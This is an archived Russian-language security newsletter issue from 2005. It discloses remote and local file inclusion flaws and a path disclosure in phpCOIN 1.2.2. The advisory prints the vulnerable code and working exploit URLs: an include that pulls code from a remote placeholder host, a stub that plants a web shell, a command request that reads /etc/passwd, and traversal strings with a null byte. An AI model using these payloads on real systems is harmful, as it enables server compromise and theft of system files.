Компьютер для продвинутых пользоватлей Выпуск по безопасности (comp.paper.supuser) : Рассылка : Subscribe.Ru

Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Декабрь 2005 →
	1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Автор

Forester

Статистика

1.394 подписчиков
-1 за неделю

← Все выпуски →

Компьютер для продвинутых пользоватлей Выпуск по безопасности

Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей

Содержание:

PhpCOIN

ПО: PhpCOIN
Версия: 1.2.2

Описание:
Бесплатный пакет программ для веб-хостинга для работы с клиентами, заказами, счетам, описаниями и возможностями помощи. phpCOIN использует более 25000 человек в мире.
Уязвимости:
1) произвольное выполнение команд
Уязвимый код находиться в coin_includes/db.php на линиях 30-39:

....
# Determine Database and include proper class file
switch($_DBCFG['dbms'])
{
case "mysql":
require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
break;
default:
require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
break;
}
....

если register_globals и allow_url_fopen в положении on, вы можете запустить любой удаленный файл. Например:
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location]
На удаленной системе вы должны иметь файл со следующем кодом:
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"");
fclose($fp);
?>
Затем запускаем команду:
http://[target]/[path]/suntzu.php?cmd=cat%20/etc/passwd
Если register_globals в позиции on и magic_quotes_gpc off вы можете запустить произвольный файл с помощью местных ресурсов. Например:
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00
2) раскрытие пути
http://[target]/[path]/config.php
'cause in coin_includes/db.php _CCFG['_PKG_PATH_DBSE'] не определен

PhpCOIN

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора

Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки

Отписаться
Вспомнить пароль

В избранное